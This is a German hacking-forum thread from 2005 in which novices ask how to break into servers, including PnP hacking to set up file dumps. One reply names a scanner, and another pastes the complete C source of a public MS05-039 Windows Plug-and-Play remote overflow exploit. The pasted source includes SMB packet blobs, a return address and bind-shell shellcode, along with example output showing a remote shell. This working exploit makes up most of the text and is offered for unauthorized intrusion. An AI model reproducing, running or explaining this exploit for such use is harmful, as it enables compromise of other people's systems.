haxx0r tuts

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von DeMiR, 21. Dezember 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 21. Dezember 2005
    Hi Leute,

    also erstmal ich habe die Rulez gelesen und keinen Eintrag gefunden der es verbieten könnte nach solchen tutorials zu suchen

    In der Tutorial Section gibt es ja mehrere tutz zum thema MSSQL hacking und IIS hacking aber das ist leider nciht mehr so aktuell denn man findet kaum noch vulnerable server! Deshalb wollte ich fragen ob ihr Tutz habt wie man zum beispiel über PHPMyAdmin Str0s bauen könnte oder über Oracle haxx0rn oder über PnP! Habt ihr solche tuts?, oder könnte mir das jemand erklären?

    GReeTz
     
  2. 22. Dezember 2005
    also wenn du zu stros nix findest..
     
  3. 22. Dezember 2005
    wie meinst du das? ja ich finde nichts! denn wenn amn jemanden fragt dann sagt er 'sag ich nicht' und in so gut wie allentuts steht 'den rest müsst ihr euch schon selber erarbeiten...'

    GReeTz
     
  4. 22. Dezember 2005
    über PnP etc tuts würd ich mich auch freuen, werd wohl mal bissl scannen und mich gerne mal bissl im hacken versuchen, falls jemand bock hat n schüler zu haben
     
  5. 22. Dezember 2005
    PnP scannen -> bei McAfee auffer HP gibts ein schönes Tool dafür
    Dann einfach den Server exploiten(wenn du das exploit nicht beschaffen kannst,dann kannstes verhacken)
    MfG
     
  6. 22. Dezember 2005
    vielen dank, bloss den satz im quote peil ich ned.

    edit: den namen vom tool wär noch praktisch, danke schön.
     
  7. 22. Dezember 2005
    meinst du das ernst? wenn ja wie heißt das tool?

    GReeTz
     
  8. 22. Dezember 2005
    sicher meint er das ernst...

    nur ich geb dirn tipp: so wie du dich hier anstellst, da würd ich es gleich lassen.

    denn wenn wir dir jetzt den namen sagen (MS05039Scan.exe) dann kommt die frage: "was muss ich da jetzt machen"

    und auf sowas hat hier keiner bock

    mfg racer
     
  9. 23. Dezember 2005
    seid ihr mal wieder unfreundlich ...tsss


    hier das tool

    Code:
    /* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
     *
     * Copyright (c) 2005 houseofdabus.
     *
     * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
     * Universal Exploit + no crash shellcode
     *
     *
     *
     *
     * .::[ houseofdabus ]::.
     *
     *
     *
     * ---------------------------------------------------------------------
     * Description:
     * A remote code execution and local elevation of privilege
     * vulnerability exists in Plug and Play that could allow an
     * attacker who successfully exploited this vulnerability to take
     * complete control of the affected system.
     *
     * This is a remote code execution and local privilege elevation
     * vulnerability. On Windows 2000, an anonymous attacker could
     * remotely try to exploit this vulnerability.
     *
     * On Windows XP Service Pack 1, only an authenticated user could
     * remotely try to exploit this vulnerability.
     * On Window XP Service Pack 2 and Windows Server 2003, only an
     * administrator can remotely access the affected component.
     * Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
     * this is strictly a local privilege elevation vulnerability.
     * An anonymous user cannot remotely attempt to exploit this
     * vulnerability on Windows XP Service Pack 2 and Windows
     * Server 2003.
     *
     * ---------------------------------------------------------------------
     * Solution:
     * http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
     *
     * ---------------------------------------------------------------------
     * Systems Affected:
     * - Windows Server 2003, SP1
     * - Windows XP SP1, SP2
     * - Windows 2000 SP4
     *
     * ---------------------------------------------------------------------
     * Tested on:
     * - Windows 2000 SP4
     *
     * ---------------------------------------------------------------------
     * Compile:
     *
     * Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
     * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
     * Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
     *
     * ---------------------------------------------------------------------
     * Example:
     *
     * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
     *
     * [*] connecting to 192.168.0.22:445...ok
     * [*] null session...ok
     * [*] bind pipe...ok
     * [*] sending crafted packet...ok
     * [*] check your shell on 192.168.0.1:7777
     * Ctrl+C
     *
     * C:\>nc 192.168.0.1 7777
     *
     * Microsoft Windows 2000 [Version 5.00.2195]
     * (C) Copyright 1985-2000 Microsoft Corp.
     *
     * C:\WINNT\system32>
     *
     * ---------------------------------------------------------------------
     *
     * This is provided as proof-of-concept code only for educational
     * purposes and testing by authorized individuals with permission
     * to do so.
     *
     */
    
    /* #define _WIN32 */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    #ifdef _WIN32
    #include <winsock2.h>
    #pragma comment(lib, "ws2_32")
    #else
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #endif
    
    
    unsigned char SMB_Negotiate[] =
     "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
     "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
     "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
     "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
     "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
     "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
     "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
     "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
    
    
    unsigned char SMB_SessionSetupAndX[] =
     "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
     "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
     "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
     "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
     "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
     "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
     "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
     "\x2E\x00\x30\x00\x00\x00\x00\x00";
    
    
    unsigned char SMB_SessionSetupAndX2[] =
     "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
     "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
     "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
     "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
     "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
     "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
     "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
     "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
     "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
     "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
     "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
     "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
     "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
    
    
    unsigned char SMB_TreeConnectAndX[] =
     "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
     "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";
    
    
    
    unsigned char SMB_TreeConnectAndX_[] =
     "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
    
    
    /* browser */
    unsigned char SMB_PipeRequest_browser[] =
     "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
     "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
     "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
     "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
     "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
    
    
    unsigned char SMB_PNPEndpoint[] =
    /* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
     "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
     "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
     "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
     "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
     "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
     "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
     "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
     "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
    
    
    
    unsigned char RPC_call[] =
     "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
     "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
     "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
     "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
     "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
     "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
     "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
     "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
     "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
     "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
     "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
     "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
     "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
    
     /* jmp over - entry point */
     "\xEB\x08\x90\x90"
    
     /* pop reg; pop reg; retn; - umpnpmgr.dll */
     "\x67\x15\x7a\x76" /* 0x767a1567 */
    
     /* jmp ebx - umpnpmgr.dll
     "\x6f\x36\x7a\x76" */
    
     "\xEB\x08\x90\x90\x67\x15\x7a\x76"
     "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    
    
    unsigned char RPC_call_end[] =
     "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";
    
    
    unsigned char bind_shellcode[] =
     "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
     "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
     "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
     "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
     "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
     "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
     "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
     "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
     "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
     "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
     "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
     "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
     "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
     "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
     "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
     "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
     "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
     "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
     "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
     "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
     "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
     "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";
    
    #define SET_PORTBIND_PORT(buf, port) \
     *(unsigned short *)(((buf)+186)) = (port)
    
    
    void
    convert_name(char *out, char *name)
    {
     unsigned long len;
    
     len = strlen(name);
     out += len * 2 - 1;
     while (len--) {
     *out-- = '\x00';
     *out-- = name[len];
     }
    }
    
    
    
    int
    main (int argc, char **argv)
    {
     struct sockaddr_in addr;
     struct hostent *he;
     int len;
     int sockfd;
     unsigned short smblen;
     unsigned short bindport;
     unsigned char tmp[1024];
     unsigned char packet[4096];
     unsigned char *ptr;
     char recvbuf[4096];
    
    #ifdef _WIN32
     WSADATA wsa;
     WSAStartup(MAKEWORD(2,0), &wsa);
    #endif
    
     printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
     printf("\t Universal Exploit + no crash shellcode\n\n\n");
     printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
    
    
     if (argc < 3) {
     printf("%s <host> <bind port>\n", argv[0]);
     exit(0);
     }
    
     if ((he = gethostbyname(argv[1])) == NULL) {
     printf("[-] Unable to resolve %s\n", argv[1]);
     exit(0);
     }
    
     if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
     printf("[-] socket failed\n");
     exit(0);
     }
    
     addr.sin_family = AF_INET;
     addr.sin_port = htons(445);
     addr.sin_addr = *((struct in_addr *)he->h_addr);
     memset(&(addr.sin_zero), '\0', 8);
    
    
    
     printf("\n[*] connecting to %s:445...", argv[1]);
     if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
     printf("\n[-] connect failed\n");
     exit(0);
     }
     printf("ok\n");
    
     printf("[*] null session...");
     if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
    
     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
     printf("\n[-] failed\n");
     exit(0);
     }
    
     if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
    
     len = recv(sockfd, recvbuf, 4096, 0);
     if (len <= 10) {
     printf("\n[-] failed\n");
     exit(0);
     }
    
     if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
    
     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
     printf("\n[-] failed\n");
     exit(0);
     }
    
     ptr = packet;
     memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
     ptr += sizeof(SMB_TreeConnectAndX)-1;
    
     sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
     convert_name(ptr, tmp);
     smblen = strlen(tmp)*2;
     ptr += smblen;
     smblen += 9;
     memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
    
     memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
     ptr += sizeof(SMB_TreeConnectAndX_)-1;
    
     smblen = ptr-packet;
     smblen -= 4;
     memcpy(packet+3, &smblen, 1);
    
     if (send(sockfd, packet, ptr-packet, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
    
     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
     printf("\n[-] failed\n");
     exit(0);
     }
    
     printf("ok\n");
     printf("[*] bind pipe...");
    
     if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
    
     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
     printf("\n[-] failed\n");
     exit(0);
     }
    
     if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
    
    
     len = recv(sockfd, recvbuf, 4096, 0);
     if ((len <= 10) || (recvbuf[9] != 0)) {
     printf("\n[-] failed\n");
     exit(0);
     }
    
     printf("ok\n");
     printf("[*] sending crafted packet...");
    
     // nop
     ptr = packet;
     memset(packet, '\x90', sizeof(packet));
    
     // header & offsets
     memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
     ptr += sizeof(RPC_call)-1;
    
     // shellcode
     bindport = (unsigned short)atoi(argv[2]);
     bindport ^= 0x0437;
     SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
     memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
    
     // end of packet
     memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
     RPC_call_end,
     sizeof(RPC_call_end)-1);
    
     // sending...
     if (send(sockfd, packet, 2196, 0) < 0) {
     printf("\n[-] send failed\n");
     exit(0);
     }
     printf("ok\n");
     printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    
     recv(sockfd, recvbuf, 4096, 0);
    
    return 0;
    }
    frag NICHT was du machen sollst...

    du HAST das tool damit is die sache durchgekaut


    closen


    mfg and happ4 xmas wünscht euch euer moep
     
  10. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.